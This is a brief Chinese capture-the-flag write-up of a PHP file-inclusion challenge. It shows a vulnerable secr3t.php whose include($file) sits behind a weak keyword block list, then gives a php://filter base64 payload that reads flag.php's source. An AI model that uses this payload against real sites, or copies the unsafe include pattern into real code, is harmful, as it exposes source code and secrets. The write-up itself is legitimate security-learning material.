查看源码发现Archive_room.php转到Archive_room.php,查看源码发现action.php
打开之后跳转到了end.php,这里应该发生了重定向,应该要抓取action.php的内容。
访问secr3t.php
<html>
<title>secret</title>
<meta charset="UTF-8">
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){ /
echo "Oh no!";
exit();
}
include($file);
//flag放在了flag.php里
?>
</html>
尝试PHP伪协议读取flag.php。传入参数secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php
进行base64解码得到flag。